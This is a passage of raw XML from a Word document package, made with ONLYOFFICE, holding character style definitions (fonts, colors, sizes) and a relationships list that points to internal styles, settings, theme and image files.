      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="FFA657"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle52">
    <w:name w:val="fontstyle52"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="B5CEA8"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle61">
    <w:name w:val="fontstyle61"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="569CD6"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle59">
    <w:name w:val="fontstyle59"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Narrow" w:hAnsi="Liberation Sans Narrow" w:cs="Liberation Sans Narrow" w:hint="default"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle56">
    <w:name w:val="fontstyle56"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="FF7B72"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle44">
    <w:name w:val="fontstyle44"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle50">
    <w:name w:val="fontstyle50"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono Light" w:hAnsi="FiraCode Nerd Font Mono Light" w:cs="FiraCode Nerd Font Mono Light" w:hint="default"/>
      <w:color w:val="D2A8FF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle49">
    <w:name w:val="fontstyle49"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono" w:hAnsi="FiraCode Nerd Font Mono" w:cs="FiraCode Nerd Font Mono" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle41">
    <w:name w:val="fontstyle41"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle35">
    <w:name w:val="fontstyle35"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="FiraCode Nerd Font Mono" w:hAnsi="FiraCode Nerd Font Mono" w:cs="FiraCode Nerd Font Mono" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle29">
    <w:name w:val="fontstyle29"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle21">
    <w:name w:val="fontstyle21"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="173F5B"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle27">
    <w:name w:val="fontstyle27"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
      <w:color w:val="000000"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12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b/>
      <w:bCs/>
      <w:color w:val="FF8000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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b/>
      <w:bCs/>
      <w:color w:val="ED7D31"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="12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ED7D31"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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ED7D31"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28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F3864"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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0563C1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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173F5B"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44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					<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">				<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>				<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>				<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/>				<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/>				<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jp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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.pn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ONLYOFFICE/8.3.3.21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